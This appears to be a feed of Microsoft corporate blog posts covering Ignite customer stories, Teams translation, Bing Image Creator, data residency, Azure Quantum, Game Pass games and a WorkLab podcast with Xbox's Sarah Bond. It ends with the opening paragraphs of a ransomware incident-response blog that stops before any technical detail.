It was great to connect with so many of you in person and virtually at Ignite, Microsoft’s annual gathering of developers and IT professionals. While attendees acknowledged the business impact of current macroeconomic challenges, they remain committed to maximizing the value of their digital investments by generating economies of scale with the Microsoft Cloud. Doing more with less is more important than ever as organizations are navigating uncertainty and shaping the future. Cloud-powered technologies, such as artificial intelligence (AI), the Internet of Things (IoT), and machine learning, offer organizations unparalleled agility and efficiency, accelerate innovation, and make security comprehensive while driving growth and advancing sustainability commitments.
At Ignite, we showed how organizations help people use digital capabilities to enhance their personal and professional lives: The German carmaker Mercedes-Benz is simulating and refining its vehicle production processes infinitely in the Microsoft Cloud to make its car production 20% more efficient by 2025. To provide mutual customers with more choice, Cisco and Microsoft are providing the option to run Microsoft Teams natively on Cisco Room and Desk devices. 3M is offering its Post-It® App on the Teams App Store, allowing users to digitize handwritten notes. U.K.-based Haleon is enabling people who are blind or have low vision to hear the labels of more than 1,500 consumer health products in the U.S. and U.K. with Microsoft Seeing AI. With a reimagined global app running on Azure, the NBA is providing fans with new personalization features like wall-to-wall content from every NBA game and unprecedented behind-the-scenes access to players and teams. And just last week, Switzerland-based global bank UBS announced it would move over 50% of its applications to Azure as its primary cloud platform to further drive the modernization of its global technology estate.
Mercedes-Benz and Microsoft: New MO360 Data Platform makes car production more efficient, resilient and sustainable. From left, Judson Althoff, Executive Vice President and Chief Commercial Officer of Microsoft, Jan Brecht, Chief Information Officer of Mercedes-Benz Group AG, Jörg Burzer, member of the Board of Management of Mercedes-Benz Group AG, responsible for Production & Supply Chain Management.
Industry leaders unlock economies of scale with public cloud commitments The iconic motor racing brand McLaren Automotive is committed to exceptional customer service and is using Azure for its production and development systems, unlocking cost savings of up to 70% by reserving resources for dedicated use on a one- or three-year basis. Global manufacturer Mars runs approximately 10,000 cloud flows and 4,000 apps and is using Power Platform to automate processes, including enterprise-wide approvals. Telecommunications company O2 Czech Republic is reducing the total cost of ownership by 30% for each workload it moves from its on-premises infrastructure to Azure. Taiwan-based manufacturer Inventec is improving production efficiency with Azure IoT, machine learning and 5G services, saving 50% on deployment time for its AI and auto optical inspection application and 25% on maintenance efforts. With Power BI, Denmark-based GN has raised the quality of its data by approximately 50% in only three quarters. With its cloud migration journey still underway, Greece-based energy company HELLENIC PETROLEUM Group has already seen a 30% reduction in IT infrastructure costs after migrating 50% of its workloads to Azure. Bahrain Public Transport Company is delivering increased punctuality and reliability to its customers while reducing costs by 30% with Azure.
Manufacturing and transportation leaders drive efficiencies with the Microsoft Cloud.
Organizations reinvent their operations for a greener future Coca-Cola Hellenic is embracing the industrial metaverse with HoloLens and Microsoft Mesh to visualize its bottling facilities and gain visibility across production lines. The technology also allows the company to reduce its energy consumption based on insights into the operating status of machines and its carbon dioxide emissions. Equinor is designing products and simulating their effectiveness before it implements them in the physical world. With Microsoft Energy Data Services and Azure, the Norway-based energy company is breaking down data silos to streamline operations for a low-carbon future. Germany-based energy company E.ON is accelerating the rollout of sustainable district heating and cooling grids by training its models 50% faster with Azure Data Factory and Azure Machine Learning. Telstra is looking to help enterprise, government and small business customers in Australia accelerate their sustainability progress and business growth through data insights gained with Microsoft Cloud for Sustainability. Canada-based Ontario Power Generation is choosing Azure to modernize its applications and IT infrastructure and eventually reduce its carbon footprint by accelerating its cloud migration and transforming business operations. The company has also joined the CEO Pledge initiative to commit its technology to the Government of Canada’s Computers for Schools Plus program.
YouTube Video
AI is the bridge to re-engage people across physical and digital worlds U.K.-based Barclays is deploying Microsoft Teams to bring its employees worldwide closer together. Unity is working with Microsoft to empower digital creators, 3D artists and developers to build and run real-time 3D experiences on Azure, making it easier to publish to Xbox consoles and PCs so they can reach gaming and non-gaming communities. Nissan is choosing HoloLens 2 and Dynamics 365 Guides to help its operators learn and reduce the workload on instructors. Luxembourg-based SES is leveraging Viva Insights to cut down 100,000 meeting hours a year with meeting-free Wednesdays already making 70% of SES employees feel more productive. ESPN employees are taking advantage of a virtual community for career development with games and real-time analytics built with SharePoint spaces and Microsoft Power Platform low-code capabilities. Australia-based Bank of Queensland is using Microsoft Cloud for Financial Services and Microsoft Surface devices to provide its customers and bankers with more personalized and intuitive experiences.
Barclays is enabling employees around the globe to connect without friction with Microsoft Teams.
Digital capabilities enable social inclusion and support education India-based SEEDS is applying an AI model to generate heat wave risk information for vulnerable communities. Non-profit NWEA is creating ways for improved accessible math assessments for students with vision disabilities. The Welsh Government is holding multilingual meetings with the Language Interpretation feature in Microsoft Teams to enable citizen participation. With Azure Cognitive Services, Twitter is making live audio conversations accessible to users who are deaf or hard of hearing, and Swedish national public television broadcaster SVT is improving public news accessibility across 21 regions. Blind Veterans UK is bringing together veterans of different ages for peer support with Microsoft Teams, which is accessible through their mobile devices and landlines. To foster digital equity and facilitate the search for jobs, education and access to healthcare, the Seattle Housing Authority is equipping residents with Surface Laptop Go devices.
The Seattle Housing Authority is providing convenient access to digital tools.
Winning the good fight requires relentless security commitments The Queensland Department of Education in Australia has secured 271,000 devices and servers in just six weeks with Microsoft Defender for Endpoint. Agribusiness and food company Land O’Lakes is turning to Microsoft Defender for Cloud and Microsoft Sentinel as the recipe for multicloud protection. With Microsoft Purview, the Prince William County School District in the U.S. is ensuring confidential information is properly handled and harmful content kept away from students. The State of Michigan Office of Children’s Ombudsman is enhancing data integrity and automating processes to investigate complaints regarding Michigan’s child welfare system more effectively. Brazil-based Grupo Fleury is deploying Microsoft 365 to bring advanced security and compliance controls to the company’s internal communications. FUJIFILM Group is introducing Microsoft 365 as the global communications foundation to deliver security without compromising usability. Microsoft Intune enables a unified experience for the Group’s more than 10,000 employees.
Queensland Department of Education serves more than 580,000 students.
Despite economic, societal challenges, organizations across industries continue to adapt to evolving market dynamics to meet customer needs. Their solid digital foundation has gone a long way in helping them innovate quickly and deliver critical business outcomes. As their business and technology advisor, Microsoft is incredibly proud to see how many of our customers have prospered and even thrived in the current environment, and we are looking forward to co-innovating with them to lay the groundwork for their future success.
Making Teams for iOS & Android mobile devices the best tool for multi-lingual collaboration with intelligent chat message translation.
Effective collaboration and communication in a chat requires tools and features that understand who you are, where and how you like to communicate. Microsoft Teams on mobile devices can understand customers’ preferred languages and how customers like to interact with their contacts. When collaborators are chatting in different languages, the intelligent message translation feature uses their account preferences to inform the user when they would benefit from translation, and then personalizes chat translation behavior.
Microsoft Teams for iOS & Android mobile devices introduces intelligent message translation in chats. When a user receives a chat message in a language they don’t understand, Teams informs them with a prompt to translate the chat message into the user’s preferred language. The user can also personalize their chat translation behavior by turning on automatic translation.
How does it work?
When you receive a chat message in an unfamiliar language, Teams will prompt you with the option to translate it to your preferred language.
Tap Translate to translate the message.
Tap Never translate (language) if you don’t need translation for the language. Teams will stop showing you translations for that language and the language will be added to the Never translate list in Teams mobile. You can make edits to your language preferences in Teams by tapping your profile, select Settings, under General, select Translation. To remove a language from the Never translate list, delete it to undo the change.
The Help icon to the right of Never translate (language) allows you to provide feedback that will be used to improve language detection in Teams.
After using the translation feature a few times, Teams will prompt you with the option to turn on auto-translation to automatically translate messages to your preferred language.
This translation experience is available in the latest release of Microsoft Teams for iOS & Android mobile devices. By default, your translation language will be set to your Teams language.
If you want to change your default language:
Tap your profile picture in Teams.
Tap Settings. under General, select Translation. From there, you can customize your translation settings.
Teams supports translation to and from more than 100 languages.
Manage all your Teams mobile translation preferences in your profile Settings, under General, select Translation.
Last week, we announced our new creator tools in Microsoft 365, Bing, and Edge, designed to help ignite people’s imaginations and express themselves. Today, one of those tools, Image Creator from Microsoft Bing, begins rolling out in a limited preview to select markets and will be coming later this month to Microsoft Edge to those same markets. Image Creator allows you to create an image that doesn’t exist, limited only by your imagination. Simply type in a description of something, any additional context like location or activity, and an art style, and Image Creator will make it for you.
[embedded content]
Users have always been able to search Bing Images for an image that exists on the web, but with Image Creator they’re now able to create the images they want to see. Within Edge, users can use Image Creator in their sidebar. They’re able to create an image to share a life update with their friends online and drag and drop it within their main working page, all without losing focus on their workflow.
[embedded content]
Today, we’d like to share a bit more detail about how Image Creator works and what steps we’re taking to ensure it remains fun and inclusive.
We’ve found that generally, Image Creator works best when you type in a description of something, with additional context like location or the art style you’d like to emulate, as opposed to a more limited description. See below how Image Creator brings “dog astronaut launching into space, digital art” to life, for example, and how that contrasts with “crochet goldfish pencil drawing.”
You’re really only limited by your imagination here, so please try your own prompt, and see what the tool creates. Given that imagination is as much an art as a science, Image Creator will yield four options to choose from, that best represent what you’re looking for.
As we said last week at announce, it’s important with early technologies like Image Creator – which is powered by AI technology DALL∙E 2 by OpenAI – to acknowledge that this is new and that we expect it to continue to evolve and improve. We take our commitment to responsible AI seriously. To help prevent the delivery of inappropriate results across the Designer app and Image Creator, we are working together with our partner OpenAI, who developed DALL∙E 2, to take the necessary steps and will continue to evolve our approach. We will regularly take the feedback we have and share that with OpenAI to improve the model as well as applying to our own mitigations work.
For example, OpenAI removed explicit sexual and violent content from the dataset used to train the model. We’ve also adopted a range of mitigations, such as leveraging Microsoft Bing insights on problematic queries, as well as using blocklists and classifiers powered by Azure cognitive services that lower the risk of offensive prompts being issued. These and other mitigation efforts will continually evolve over time to ensure we’re up to date with new angles of potential abuse.
Microsoft has applied additional technology to address biases sometimes found in generative image technology. While some prompts may still surface biases, this is an area we are working to continuously improve. While we’re excited to see people use Image Creator to express themselves, we also want to make sure the content created using Image Creator does not impose harm to others. This Content Policy outlines the prohibited use cases of Image Creator; if you suspect any use of Image Creator in violation of this policy, you can report it here.
We hope the steps we’re taking, and guidance above help you get the most out of the Image Creator tool and keep it fun and inclusive. We welcome your feedback and look forward to what you will create!
In this episode of “Digital Now,” Scott Guthrie, executive vice president, Cloud + AI Group, Microsoft, explains how the company convinced customers to bet on the cloud.
In the early days of Azure, Guthrie says, Microsoft became a strategic partner to our customers, rather than just a vendor, a relationship that encouraged organizations to move mission-critical workloads to the cloud. Now, he says, Azure is running in hospitals, manufacturing facilities, governments, legislatures – even in space and underseas.
“Digital Now” is a video series hosted by Andrew Wilson, chief digital officer at Microsoft, who invites friends and industry leaders inside and outside of Microsoft to share how they are tackling digital and business transformation, and explores themes like the future of work, security, artificial intelligence, and the democratization of code and data.
Also in this episode, Guthrie and Wilson discuss how companies on a cloud journey can move beyond migrating existing workloads to achieving elasticity, how the cost savings of managed services often result in a greater investment in innovation, and why our customers’ IT teams are attaining hero status.
From cozy to creepy, we pumpkin-rank some of our favorite Game Pass games to play this Halloween.
If you’ve been looking for something to sink your fangs into this Halloween, have we got a treat for you! We’ve pumpkin-ranked the following Game Pass games from fall-themed cozy gems you can snuggle up with as the weather changes, to some real creepers that will give a proper scare — pick and choose to celebrate the season however suits you! Now, go have a happy Halloween with Game Pass!
Rediscover Halloween in this imaginative RPG from Tim Schafer’s Double Fine Productions. Explore the monster-filled neighborhood of Auburn Pines, Autumn Haven Mall, and Fall Valley Carnival. Collect magical costumes with superpowers, unique weapons, and special items as you hunt down quests. Level-up your heroic warrior and battle the evil overlords in this epic adventure to save Halloween!
Betray your friends — and lie your way to victory. In the multiplayer social deduction game Eville you find yourself in a village riddled by a series of murders. Some say it might have been you … or was it? Convince others you’re not a murderer to stay alive!
Descend into the world of Hollow Knight! The award-winning action adventure of insects and heroes. Explore twisting caverns, ancient cities, and deadly wastes. Battle tainted creatures and befriend bizarre bugs. Uncover ancient history and solve the mysteries buried at the kingdom’s heart.
Reaping souls of the dead and punching a clock might get monotonous but it’s honest work for a crow. The job gets lively when your assigned soul is stolen and you must track down a desperate thief to a realm untouched by death, where creatures grow far past their expiry date and overflow with greed and power.
A group of kids are trying to break into their suspicious neighbor’s basement to rescue their missing friend. Only problem is that one of the kids is a traitor — a Secret Neighbor in disguise. His job is to gain the trust of other players and betray them; kids win if they get into the basement.
Under grim moonlight, the fierce clayborne warrior Grey Irma battles, driven by a lonesome purpose: Find the Sculptor, and unravel the mystery of her existence. Push the limits of your combat skills and master new abilities to progress through an unforgiving nonlinear 2D world and face off against the relentless darkness that seeks to destroy you.
Part human, part demon, and obsessed with vengeance. Become The Unknown, and fight through the fiercest domains of Hell. Destroy the demon hordes and their leaders to set yourself up for an epic showdown with The Red Judge herself. Every legend has a song. And yours is one of metal, vengeance, and destruction.
In this direct sequel to A Plague Tale: Innocence, embark on a heartrending journey into a brutal, breathtaking world, and discover the cost of saving those you love in a desperate struggle for survival. Strike from the shadows or unleash hell with a variety of weapons, tools, and unearthly powers.
A thrilling cooperative first-person shooter from the creators of the critically acclaimed Left 4 Dead franchise. You’re at the center of a war against the Ridden. These once-human hosts of a deadly parasite have turned into terrifying creatures bent on devouring what remains of civilization. With humanity’s extinction on the line, it’s up to you and your friends to take the fight to the enemy, eradicate the Ridden, and reclaim the world.
Choose between playing as an unstoppable killer or one of four survivors trying to evade a gruesome death. Each character has their own deep progression system and plenty of unlockables that can be customized to fit your personal strategy. Work together to escape, or stalk and sacrifice every survivor.
Set in a nightmarish universe of odd forms and somber tapestry. Isolated and lost inside this dream-like world, you will explore different interconnected regions in a non-linear fashion. Every location contains its own theme, puzzles, and characters that are integral in creating a cohesive world.
Commercial and public sector organizations continue to look for new ways to advance their goals, improve efficiencies, and create positive employee experiences. The rise of the digital workforce and the current economic environment compels organizations to utilize public cloud applications to benefit from efficiency and cost reduction. However, organizations are rightfully concerned about data residency, privacy, and security, as evidenced by the myriad of privacy regimes, national security laws, and data residency requirements being erected by national and regional authorities. From a 2017 baseline of 67 laws and regulations in 35 countries, worldwide data residency measures have more than doubled to 144, spread across 62 countries.1
Microsoft is a leader in helping organizations of all types throughout the world address their data residency, privacy, and security requirements. Microsoft has the most comprehensive compliance coverage of any cloud service provider with 100-plus offerings including more than 50 which are specific to global regions and countries.
Beginning in 2014 with our initial local datacenter region in Japan to our recent launch in Qatar, Microsoft 365 now has local datacenter regions in 15 countries worldwide with announced plans to launch 13 additional local datacenter regions over the coming years.2 This unrivaled fleet of datacenter regions provides Microsoft 365 customers with global coverage coupled with local choice for customer data residency.
For commercial and public sector customers, we provide the leading data residency commitment in the productivity and collaboration space, storing customer data at rest in any of our multiple macro-regions or local datacenter regions to suit customer requirements. Until now, this unparalleled data residency commitment covered customer content in the core Microsoft 365 workloads of Exchange Online, OneDrive for Business, and SharePoint Online.
Microsoft 365 has a heritage in providing sophisticated customer data residency solutions, like Multi-Geo Capabilities for multi-national companies that require more granular data location controls. In 2021, Microsoft also announced expanded commitments to create an EU Data Boundary for the Microsoft Cloud.3 With this commitment, Microsoft pledged to process and store commercial and public sector European Union customer data within the European Union. This commitment will apply across all of Microsoft’s core cloud services including Microsoft Azure, Dynamics 365, and Microsoft 365.
But we aren’t stopping there. In this new age of hybrid work and the increasing reliance on digital transformation, our customers are demanding additional controls for data, including where it resides and its treatment.
Microsoft Teams and data residency
With over 270 million monthly active Microsoft Teams users, customers have turned to Teams as an indispensable tool to communicate, collaborate, and stay in the flow of hybrid work. Microsoft is now adding Teams to the customer data residency commitments in our Product Terms, covering commercial and public sector customers in the existing 15 local datacenter regions. With this extension to our existing promises, Teams core customer data, consisting of Teams chat messages (including private messages, channel messages, meeting messages, and associated images), and meeting recordings,4 present in the tenant, will be stored at rest in local datacenter regions.
Microsoft 365 Advanced Data Residency add-on
We are also announcing the new Microsoft 365 Advanced Data Residency add-on that will extend the commitments for customer data storage at rest. With availability beginning in November 2022, the Advanced Data Residency add-on is designed to give regulated commercial and public sector customers of Microsoft 365 additional assurances that may help with their compliance with data residency laws, regulations, and industry standards. It will provide eligible customers with premium services, including data storage at rest commitments for expanded workloads including Exchange Online Protection, Microsoft Defender for Office Plan 1, Office for the Web, Microsoft Viva Connections, Microsoft Viva Topics, and components of the Microsoft Purview suite. Additionally, the add-on provides customers eligible to migrate their Microsoft 365 tenants into our local datacenter regions with prioritized migration benefits.
Looking ahead
We’re committed to building on the value and services available for Microsoft 365 customers with the Advanced Data Residency add-on and other data residency offerings. Microsoft continues to invest in data residency, privacy, and security advancements that allow our customers to have peace of mind in the ever-evolving regulatory landscape. Through the expansion of our local datacenter regions, advancements in data residency offerings across the Microsoft 365 portfolio, and connection to the Microsoft cloud, we are excited to continue helping customers across the world accelerate their digital transformation.
Since it was introduced in February, the Azure Quantum Credits program has attracted applicants ranging from enterprise innovators and solution partners to academic researchers and student explorers. It has been exciting to see the diversity of proposals submitted – featuring the use of quantum hardware accessible through Azure Quantum to investigate novel use cases, experiment with state-of-the-art algorithms, and pursue applications in industries like chemistry and materials sciences.
From New York to Tennessee, Hyderabad to Verona, and Finland to Canada—we’re delighted to be the quantum platform of choice for research in areas as diverse as molecular energy estimation, quantum computer crosstalk, protein folding dynamics, quantum machine learning for price prediction, and quantum detection of cardiovascular events in cardiac signals.
We are pleased to showcase the creativity and energy of three of our credit recipients—the University of Washington, Bar-Ilan University, and KPMG in collaboration with the Danish Technical University (DTU)—who leveraged IonQ and or Quantinuum hardware through the Credits program.
Watch the video below to see these projects in action
The benefits of getting hands-on with quantum hardware in a classroom setting are clear. As Kai-Mei Fu, Professor of Physics at the University of Washington, described, “Our students had never accessed hardware. Many people think that you can just do everything on a simulator. It turns out, there are some surprising results that happen when you use a real quantum computer that are very important. It’s extremely valuable to be on real machines through Azure Quantum.”
Professor Emanuele Dalla Torre, of Bar-Ilan University’s Department of Physics, added “Azure Quantum allows you to connect to different quantum computers. Through this, we were able to see that what we had imagined in our theoretical analysis was happening in the real world on a quantum computer. Our experiment with Azure Quantum gave us a hint of what the possible near-term applications of quantum computing are.“
In a public-private research endeavor, solution partner KPMG collaborated with DTU on neural networks-focused research using Azure Quantum Credits.
Bent Dalager, Partner and Global Head of KPMG’s Quantum Hub, noted, “Azure Quantum democratized the ability to use quantum computing. Instead of having to rely on a specific piece of hardware, through a language layer, you can pursue quantum computing through Azure Quantum in a tremendously more efficient way.”
In the last six months, the Azure Quantum Credits program has expanded from its initial offering of IonQ Harmony and Quantinuum H1 quantum processing units (QPUs). The associated simulator and emulator also now offer experimentation on IonQ Aria’s 23 algorithmic qubit system, Quantinuum H2, and Rigetti’s 40 qubit Aspen-11 and latest 80 qubit modular chip Aspen-M-1 endpoints.
Coming soon, Pasqal’s neutral atom-based quantum technology will be available in the Azure Quantum Credits program, allowing innovators and explorers to harness Pasqal’s impressive qubit connectivity and the ability to directly manipulate neutral atoms.
The enthusiasm we’ve enjoyed during our weekly office hours about Azure Quantum Credits has been palpable and we’ve appreciated the benefit of community feedback in continuously improving the Credits program. For quantum educators, the Azure Quantum Credits program is a cornerstone of our one-stop resource for curriculum, samples, and tools to facilitate the skilling up of a quantum-ready workforce.
TONYA MOSLEY: That’s our guest, Sarah Bond, corporate vice president of Xbox at Microsoft. This week she talks to us about games, or more specifically, what games have to teach us about the future of work. Today, 3 billion people on the planet play games, which have a unique and powerful ability to enable collaboration, break barriers, build rapport, spark imagination, and create empathy. Gaming allows strangers to come together and work as a team to achieve a goal, even if they don’t speak the same language, have never met, live in a different part of the world, or have different abilities. As companies explore new ways to enable teamwork, including forays into the metaverse, they can learn a lot about how to best proceed from games. Sarah is the perfect person to walk us through that. Now here’s our conversation.
TONYA MOSLEY: Hi, Sarah.
SARAH BOND: Hi.
TONYA MOSLEY: Three billion people play games right now. I mean, there is so much community building that happens within gaming. We were talking about and thinking about what gaming can teach us about the future of work. And I know that you’ve been thinking a lot about that as well.
SARAH BOND: There used to be a time in gaming where the device was the center of the experience for the user. It would be about the console you bought, the PC that you configured. That paradigm was built on a set of technical limitations that existed from when gaming really started to take off as an industry. A lot of those limitations actually don’t exist anymore, and we’re just sort of carrying forward that paradigm. People really want to be able to play the games they want with the people that they want where they want. I think the same is really true for how people want to work, right? It used to be that you had to come into the office to collaborate with people. The tools, the technology, the services just weren’t there to replicate the experience. I think that there’s so much about how we’re seeing work change, the idea that you can collaborate at any time in any space synchronously, but also asynchronously, using the tools we create. That’s very similar to what we’re seeing happen in gaming.
TONYA MOSLEY: How did you come into this job? Can you share with us a little bit about your career journey and what led you to this role?
SARAH BOND: Well, you know, I always played games growing up, it was a big part of my upbringing. My dad and I, the first game I can remember playing with him was King’s Quest II when I was six or seven years old. And, after college, I pursued a career up through the business side, but really focused on consumer tech. I worked at McKinsey, I went to business school, and then I spent a good amount of time working at T-Mobile. I started as the chief of staff there, and then I led strategy, and then I ran business development. Then I got to a point where I was running a few businesses. Then at that point, I got the opportunity to come to Microsoft. And after I’d been at Microsoft for a few months, the role leading business development for gaming came open, and it just really clicked for me to take that role, especially considering how much work I had done in consumer tech throughout my career, and also that I had grown up playing games. And I led that team for about two years and it was a fantastic experience. And after about two years in that role, we were looking at the opportunity and we realized that it was really important that we talk to game developers and creators, as Microsoft, in a way that was really tailored to their needs, and that based off of everything we knew at Xbox, it was important to center that in Xbox. So in addition to all of the responsibilities I had leading the commercial relationships with game developers, I also got responsibility for all of the technical tools and services that we build to meet their needs.
TONYA MOSLEY: Microsoft has been thinking very deeply as well about the metaverse, something that we’ve been talking about over the last few years as a place to live and work, essentially. I mean, an example of this is creating digital offices to connect with colleagues, as you say, who are all around the world. What are you most excited about in this space?
SARAH BOND: Well, what I’m most excited about is when people talk about a metaverse experience. They’re talking about a digital world that’s immersive, that can hold millions of people simultaneously who have individual identities and wallets and histories. And I look at all of that and I realize that, as Microsoft, we have all those capabilities because we know how to build a game, and all of those things exist in a game. That’s what Forza is, that’s what Halo is, that’s what Minecraft is. And so I’m really excited because we are in such a beautifully unique position to take the things that we’ve learned in the gaming industry about how to do that, and how to do that in a way that’s secure, that respects privacy, that has parental controls, and real thought and care in how it’s executed and infused in it because we’ve already learned all of those things as part of the gaming industry.
TONYA MOSLEY: Right. I mean, and building that connectivity—one interesting phenomenon, as you mention, is how online multiplayer games encourage collaboration between two people who have never met each other in person. We see that with Minecraft and other games like that, but also folks who don’t speak the same language. So many industries are navigating ways, as you said, to improve remote work specifically. What can business leaders take away from the success of collaboration in gaming?
SARAH BOND: It really is the only media forum where you can do something with someone and accomplish something in coordination with them. You may have never met them, you don’t necessarily speak the same language, you don’t even know what they look like. That’s very powerful and I think important in today’s society, where the breadth of the different cultures and experiences that we encounter is wider and more varied, and in some ways more difficult to process because of that than it ever has been before in human history. And so when I think about that in business, so much of what we’re doing and the things that we invest in are to enable that exact same experience, to take down barriers like time zone, and to auto-translate that makes people well understood. It allows so many more perspectives and also new opportunities for collaboration across distances and across a range of capabilities that before wasn’t possible.
TONYA MOSLEY: You believe games can foster empathy…
SARAH BOND: I do. You know, I think empathy comes from not just understanding the position that someone else is in, but feeling an emotion about it and being compelled to act on that emotion. And when you’re playing a game, you have to go through that whole cycle. You have to understand the situation, and then you make a choice. And so very uniquely, when you’re playing a game, either it’s because you’re collaborating with someone who you may otherwise not have met, or if it’s because you’re experiencing a story from a perspective that’s unique to you, there’s a level of empathy and shared understanding that can come from a gaming experience that is quite beautiful.
TONYA MOSLEY: You know, many non-gaming businesses are focused on how to shift the ways its employees interact with technology, specifically building up the metaverse. What do you think the games industry can teach us about how to construct and engage in virtual worlds that people truly want to explore and collaborate within?
SARAH BOND: So much. I mean, look, it’s not just about creating an avatar and putting it in a virtual world. It’s about there being a reason for being there—a why—that’s what games give you. They give you a motivation, something that you could accomplish. And it’s also about doing it in a way where people believe that they can express themselves in a way that’s safe and inclusive. And that core thing, I mean, often in gaming we talk about the mechanics of a game, but that’s really talking about that core motivational loop and how you make that one that’s motivating and delightful and that people can be included in. And I think that’s the key thing. That is what makes games special.
TONYA MOSLEY: I’ve heard you say that fostering relationships with the people who develop games for Microsoft platforms is a major priority. And I’m sure you’ve learned a lot over the years as you’ve cultivated those game creator relationships. I’m thinking about what lessons other industries can learn as well from building those relationships as they think about a metaverse that allows its employees to interact with technology and deepen their connectivity and their working relationships with each other.
SARAH BOND: In the end, all of life is the interactions you have with each other. As much as I think people like to talk about business being about optimizing a set of dollars and cents, the real value comes from the people who make the choices, build the visions, and drive the execution. In the case of game creators, we take it very seriously that we push the boundaries of making it possible for us to have a relationship, for it to be possible for any creator to bring their game to Xbox. And I want the people to build those experiences to represent all of the people in the world, not just people who are like me or have the same views. So building those relationships, but really extending them and making it possible for anyone who wishes to create a game and bring their story to the fore through that medium is important, you know, to run a good business. But it’s also important when we think about the impact that gaming can have on society.
TONYA MOSLEY: You know, to this point, we have been online and in virtual spaces long enough to also know that they can be toxic. There can be negative aspects of it. What can the game industry also teach metaverse builders about encouraging positive interactions?
SARAH BOND: We’ve spent so much time on this. It’s so important to us. We have the phrase, ‘when everyone plays, we all win.’ And that doesn’t just mean that someone can actually play, it means that you can enjoy it—that you go away feeling positive and wanting to go back. And we see consistently that if somebody has a toxic or negative experience on our platform, they don’t want to go back. It doesn’t matter. All the other stuff goes away if you went to have a fun time and you come away hurt. And so we do a lot of investment in creating the tools in the community that creates a positive gaming experience for people. We do it in our policies; we’re super clear about our code of conduct and how we want individuals to behave. We do it in the investments that we do in tech to monitor what’s going on in parental controls and settings that you can set so that you can go into spaces and feel comfortable. And we also do it in the community itself. I mean, one of the most beautiful things about the Xbox community is that we’re so clear about our intent. We’re so clear about what we want individuals to experience that when that doesn’t happen, the community will actually help self-regulate, will let us know when something is going on to ensure that we actually build on that experience and are able to deliver it. And I think it’s all of those things, continually iterating and investing in them and taking it very seriously, that’s important for us to bring to metaverses as they start scaling around the world.
TONYA MOSLEY: You believe that playing games can stimulate the brain and encourage a growth mindset, which is from the influential book by Carol Dweck.
SARAH BOND: When you think about what Carol Dweck is really saying in her book, it’s the idea that if you put in effort, it will lead to a different result. It turns out a game perfectly embodies this idea, like if you start out playing a game—this is my experience frequently—I have no idea what to do. Like, I get in my character, I do a couple of things, I die, or I get frustrated, or I can’t figure out a puzzle and the level seems impossible. But then I come back and I try again and again and again. And in the end, by the time you have invested that time in it and you’ve learned how it works and you’ve figured out the mechanics, a level that before would have seemed impossible or a series of jumps that you couldn’t have imagined being able to do, you can breeze right through. And the consequence of failing is, relative to some consequences in life when you try something risky, pretty low, right? You might lose some coins or something, but you’ll come back. And so I love the fact that gaming, just by its very nature, teaches you that if you keep working at it, something that seems impossible, you can master. And I’ve really appreciated seeing that in my kids. My littlest loves to play games. He actually regularly plays with my dad, which I think is adorable. I mean, my dad is in his mid 70s, my son is 8, and they will sit side-by-side and do this thing together. But he’s learning that, you know, because he’s little, that failure isn’t failure, that if you get something wrong or you mess up that it doesn’t define you. And he’ll have a reaction, he’ll be like, ‘Oh, but I messed up,’ and he’s crying and everything. I’m like, ‘Well, no, get back up and try again.’ And he’s like, ‘I can?’ And so I see him learning and growing through the experience of a game, and therefore being more willing to take risks or try new things in real life because he’s already built that confidence that applying himself can lead to a different result.
TONYA MOSLEY: Yes, I’ve actually seen this as well firsthand with my 9-year-old who builds worlds with his friends and cousins within Minecraft. Which makes me wonder about what skills do you see forming for these kids who have grown up creating these virtual worlds or grown up gaming and building on this idea of a growth mindset?
SARAH BOND: Well, you know, when I was a girl, I had two phone numbers memorized, I think three, actually. I had my own phone number memorized, I had my first best friend’s phone number, and my second best friend’s phone number. And I would probably call them in about that order. And the idea of maintaining a friendship when I moved away that didn’t involve seeing someone in person every day was completely foreign and impossible. So I think the number one thing, honestly, that kids are learning from gaming is the definition of a relationship and what it means and how you can engage with someone—[this] transcends being in person. And I really see my daughter, my son, you know, their ability to connect with and identify with people over many, many mediums is very, very different than I think our generation that just didn’t grow up building bonds in that way.
TONYA MOSLEY:You know, the forms of collaboration and games can be very ambitious and intricate and require extraordinary levels of collaboration. What can leaders and people managers learn from looking at multiplayer games specifically, like esports, for instance?
SARAH BOND: Let’s give Overwatch as an example. Overwatch has different types of characters that you can play. It’s a team game, so you play as a team, but you pick a different type of character and the characters have different abilities. There’s some that have healing abilities or some that are really fast, you know, they have different weaponry that are associated with them. And when people first started playing Overwatch, they didn’t realize how much this mattered. But it turns out that a team has a better chance of winning if you have the right variety of characters adopted. Now, the game is built that way, that’s how they built it. They didn’t have to build it that way, but I appreciate they built it that way because that is a wonderful lesson for all of us as leaders—because that’s actually how the real world works.
TONYA MOSLEY: Sounds like I’ve got to start playing more games.
SARAH BOND: You never know what you might find out.
TONYA MOSLEY: Sarah Bond, thank you so much for this conversation.
SARAH BOND: Thank you. It was wonderful to connect. Thank you for having me.
TONYA MOSLEY: Thanks again to Sarah Bond, corporate vice president of Xbox at Microsoft. And that’s it for this episode of the WorkLab podcast from Microsoft. Please subscribe and check back for the next episode of WorkLab, where I’ll be speaking with Versha Sharma, editor in chief of Teen Vogue, about the wants and needs of Gen Z employees entering the workforce. And please rate us, review, and follow us wherever you listen. It really helps us out. And if you’ve got a question, we’d love to hear from you. You can drop us an email at worklab@microsoft.com. And check out the WorkLab digital publication too, where you can find the latest Work Trend Index report, as well as a transcript of this episode. You can find everything at Microsoft.com/WorkLab. WorkLab is produced by Microsoft and Godfrey Dadich Partners and Reasonable Volume. I’m your host, Tonya Mosley. Our correspondents are Mary Melton and Desmond Dickerson. Sharon Kallander and Matthew Duncan produced this podcast. And Jessica Voelker is the WorkLab editor. Thank you for listening.
Ransomware is one of the most pervasive threats that Microsoft Detection and Response Team (DART) responds to today. The groups behind these attacks continue to add sophistication to their tactics, techniques, and procedures (TTPs) as most network security postures increase.
In this blog, we detail a recent ransomware incident in which the attacker used a collection of commodity tools and techniques, such as using living-off-the-land binaries, to launch their malicious code. Cobalt Strike was used for persistence on the network with NT AUTHORITY/SYSTEM (local SYSTEM) privileges to maintain access to the network after password resets of compromised accounts.
This incident highlights an attacker’s ability to have a longstanding dwell time on a network before deploying ransomware. We will also discuss the various techniques used as well as the recommended detections and defense techniques that customers can use to increase protection against these types of attacks.
Microsoft recommends hunting proactively for pre-ransomware behaviors and hardening your network to prevent impact. Refer to https://aka.ms/ransomware-as-a-service for more information about defending against ransomware-related incidents.
What we found
Figure 1. Overall timeline of activities of the ransomware incident
Initial access
